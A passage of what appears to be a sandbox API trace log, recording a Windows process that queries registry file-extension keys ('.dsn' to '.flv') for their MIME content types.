lpString1=".dsn", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.866] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dsn", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.866] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.866] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dsp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.866] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dsp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.866] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.866] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dsw", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.866] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dsw", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.915] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.915] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dtcp-ip", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.915] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dtcp-ip", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.915] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x28) returned 0x0 [0103.915] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24bcaec, lpcbData=0x19fc20*=0x28 | out: lpType=0x19fc10*=0x1, lpData="application/x-dtcp1", lpcbData=0x19fc20*=0x28) returned 0x0 [0103.916] CharLowerBuffW (in: lpsz="application/x-dtcp1", cchLength=0x13 | out: lpsz="application/x-dtcp1") returned 0x13 [0103.916] CharLowerBuffW (in: lpsz=".dtcp-ip", cchLength=0x8 | out: lpsz=".dtcp-ip") returned 0x8 [0103.916] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.916] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dvr-ms", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.916] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dvr-ms", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.916] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x1e) returned 0x0 [0103.916] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a54ec, lpcbData=0x19fc20*=0x1e | out: lpType=0x19fc10*=0x1, lpData="video/x-ms-dvr", lpcbData=0x19fc20*=0x1e) returned 0x0 [0103.916] CharLowerBuffW (in: lpsz="video/x-ms-dvr", cchLength=0xe | out: lpsz="video/x-ms-dvr") returned 0xe [0103.916] CharLowerBuffW (in: lpsz=".dvr-ms", cchLength=0x7 | out: lpsz=".dvr-ms") returned 0x7 [0103.916] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.916] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dwfx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.916] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dwfx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.916] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x26) returned 0x0 [0103.917] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24d2474, lpcbData=0x19fc20*=0x26 | out: lpType=0x19fc10*=0x1, lpData="model/vnd.dwfx+xps", lpcbData=0x19fc20*=0x26) returned 0x0 [0103.917] CharLowerBuffW (in: lpsz="model/vnd.dwfx+xps", cchLength=0x12 | out: lpsz="model/vnd.dwfx+xps") returned 0x12 [0103.917] CharLowerBuffW (in: lpsz=".dwfx", cchLength=0x5 | out: lpsz=".dwfx") returned 0x5 [0103.917] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".easmx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.917] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".easmx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.917] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x28) returned 0x0 [0103.917] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ac, lpcbData=0x19fc20*=0x28 | out: lpType=0x19fc10*=0x1, lpData="model/vnd.easmx+xps", lpcbData=0x19fc20*=0x28) returned 0x0 [0103.917] CharLowerBuffW (in: lpsz="model/vnd.easmx+xps", cchLength=0x13 | out: lpsz="model/vnd.easmx+xps") returned 0x13 [0103.917] CharLowerBuffW (in: lpsz=".easmx", cchLength=0x6 | out: lpsz=".easmx") returned 0x6 [0103.917] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ec3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.917] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".ec3", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.917] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x14) returned 0x0 [0103.917] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249aecc, lpcbData=0x19fc20*=0x14 | out: lpType=0x19fc10*=0x1, lpData="audio/ec3", lpcbData=0x19fc20*=0x14) returned 0x0 [0103.918] CharLowerBuffW (in: lpsz="audio/ec3", cchLength=0x9 | out: lpsz="audio/ec3") returned 0x9 [0103.918] CharLowerBuffW (in: lpsz=".ec3", cchLength=0x4 | out: lpsz=".ec3") returned 0x4 [0103.918] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".edrwx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.918] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".edrwx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.918] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x28) returned 0x0 [0103.918] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ac, lpcbData=0x19fc20*=0x28 | out: lpType=0x19fc10*=0x1, lpData="model/vnd.edrwx+xps", lpcbData=0x19fc20*=0x28) returned 0x0 [0103.918] CharLowerBuffW (in: lpsz="model/vnd.edrwx+xps", cchLength=0x13 | out: lpsz="model/vnd.edrwx+xps") returned 0x13 [0103.918] CharLowerBuffW (in: lpsz=".edrwx", cchLength=0x6 | out: lpsz=".edrwx") returned 0x6 [0103.918] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".elm", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.918] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".elm", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.918] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.918] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".emf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.919] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".emf", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.919] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x18) returned 0x0 [0103.919] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a54ec, lpcbData=0x19fc20*=0x18 | out: lpType=0x19fc10*=0x1, lpData="image/x-emf", lpcbData=0x19fc20*=0x18) returned 0x0 [0103.919] CharLowerBuffW (in: lpsz="image/x-emf", cchLength=0xb | out: lpsz="image/x-emf") returned 0xb [0103.919] CharLowerBuffW (in: lpsz=".emf", cchLength=0x4 | out: lpsz=".emf") returned 0x4 [0103.919] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".eml", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.919] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".eml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.919] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.919] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".eprtx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.919] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".eprtx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.919] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x28) returned 0x0 [0103.920] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ac, lpcbData=0x19fc20*=0x28 | out: lpType=0x19fc10*=0x1, lpData="model/vnd.eprtx+xps", lpcbData=0x19fc20*=0x28) returned 0x0 [0103.920] CharLowerBuffW (in: lpsz="model/vnd.eprtx+xps", cchLength=0x13 | out: lpsz="model/vnd.eprtx+xps") returned 0x13 [0103.920] CharLowerBuffW (in: lpsz=".eprtx", cchLength=0x6 | out: lpsz=".eprtx") returned 0x6 [0103.920] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".eps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.920] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".eps", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.920] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x2e) returned 0x0 [0103.920] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ec, lpcbData=0x19fc20*=0x2e | out: lpType=0x19fc10*=0x1, lpData="application/postscript", lpcbData=0x19fc20*=0x2e) returned 0x0 [0103.920] CharLowerBuffW (in: lpsz="application/postscript", cchLength=0x16 | out: lpsz="application/postscript") returned 0x16 [0103.920] CharLowerBuffW (in: lpsz=".eps", cchLength=0x4 | out: lpsz=".eps") returned 0x4 [0103.920] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".epub", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.920] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".epub", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.920] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x2a) returned 0x0 [0103.920] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x2449a6c, lpcbData=0x19fc20*=0x2a | out: lpType=0x19fc10*=0x1, lpData="application/epub+zip", lpcbData=0x19fc20*=0x2a) returned 0x0 [0103.921] CharLowerBuffW (in: lpsz="application/epub+zip", cchLength=0x14 | out: lpsz="application/epub+zip") returned 0x14 [0103.921] CharLowerBuffW (in: lpsz=".epub", cchLength=0x5 | out: lpsz=".epub") returned 0x5 [0103.921] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".erf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.921] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".erf", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.921] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x14) returned 0x0 [0103.921] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249ae7c, lpcbData=0x19fc20*=0x14 | out: lpType=0x19fc10*=0x1, lpData="image/ERF", lpcbData=0x19fc20*=0x14) returned 0x0 [0103.921] CharLowerBuffW (in: lpsz="image/ERF", cchLength=0x9 | out: lpsz="image/erf") returned 0x9 [0103.921] CharLowerBuffW (in: lpsz=".erf", cchLength=0x4 | out: lpsz=".erf") returned 0x4 [0103.921] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".etp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.921] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".etp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.921] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.921] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".evt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.922] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".evt", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.922] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.922] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".evtx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.922] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".evtx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.922] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.922] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.922] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".exc", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.922] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.922] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exe", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.922] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".exe", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.923] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x32) returned 0x0 [0103.923] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23f866c, lpcbData=0x19fc20*=0x32 | out: lpType=0x19fc10*=0x1, lpData="application/x-msdownload", lpcbData=0x19fc20*=0x32) returned 0x0 [0103.923] CharLowerBuffW (in: lpsz="application/x-msdownload", cchLength=0x18 | out: lpsz="application/x-msdownload") returned 0x18 [0103.923] CharLowerBuffW (in: lpsz=".exe", cchLength=0x4 | out: lpsz=".exe") returned 0x4 [0103.923] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.923] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".exp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.923] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.923] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ext", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.923] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".ext", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.923] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.923] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ex_", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.923] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".ex_", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.924] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.924] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".eyb", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.924] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".eyb", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.924] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.924] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".faq", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.924] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".faq", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.924] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.924] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.924] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".fdf", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.924] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x28) returned 0x0 [0103.924] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ec, lpcbData=0x19fc20*=0x28 | out: lpType=0x19fc10*=0x1, lpData="application/vnd.fdf", lpcbData=0x19fc20*=0x28) returned 0x0 [0103.925] CharLowerBuffW (in: lpsz="application/vnd.fdf", cchLength=0x13 | out: lpsz="application/vnd.fdf") returned 0x13 [0103.925] CharLowerBuffW (in: lpsz=".fdf", cchLength=0x4 | out: lpsz=".fdf") returned 0x4 [0103.925] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fdm", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.925] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".fdm", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.925] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.925] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.925] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".fif", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.925] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x2a) returned 0x0 [0103.925] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ec, lpcbData=0x19fc20*=0x2a | out: lpType=0x19fc10*=0x1, lpData="application/fractals", lpcbData=0x19fc20*=0x2a) returned 0x0 [0103.925] CharLowerBuffW (in: lpsz="application/fractals", cchLength=0x14 | out: lpsz="application/fractals") returned 0x14 [0103.925] CharLowerBuffW (in: lpsz=".fif", cchLength=0x4 | out: lpsz=".fif") returned 0x4 [0103.925] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fky", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.925] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".fky", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.926] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.926] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flac", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.926] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".flac", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.926] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x1a) returned 0x0 [0103.926] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a554c, lpcbData=0x19fc20*=0x1a | out: lpType=0x19fc10*=0x1, lpData="audio/x-flac", lpcbData=0x19fc20*=0x1a) returned 0x0 [0103.926] CharLowerBuffW (in: lpsz="audio/x-flac", cchLength=0xc | out: lpsz="audio/x-flac") returned 0xc [0103.926] CharLowerBuffW (in: lpsz=".flac", cchLength=0x5 | out: lpsz=".flac") returned 0x5 [0103.926] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.926] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".flv", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.926] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, 